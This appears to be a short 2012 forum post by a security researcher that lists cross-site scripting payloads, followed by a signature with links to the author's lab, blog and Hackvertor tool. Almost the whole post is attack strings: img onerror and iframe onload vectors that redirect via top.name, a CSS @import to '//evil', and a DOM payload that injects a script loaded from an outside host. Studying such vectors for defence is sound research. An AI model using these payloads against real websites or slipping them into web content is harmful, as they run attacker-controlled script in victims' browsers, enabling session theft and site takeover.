<img src=1 onerror=location=top.name>
<style>@import//evil;
<iframe onload=location=top.name>
Or use the dom:
<img src=1 onerror=with(s=createElement('s\cript'))src='//businessinfo.co.uk/labs/xss/xss.js',document.body.appendChild(s)>
------------------------------------------------------------------------------------------------------------
"People who say it cannot be done should not interrupt those who are doing it.";
labs : [
www.businessinfo.co.uk]
blog : [
www.thespanner.co.uk]
Hackvertor : [
hackvertor.co.uk]
Edited 1 time(s). Last edit at 03/22/2012 05:08AM by Gareth Heyes.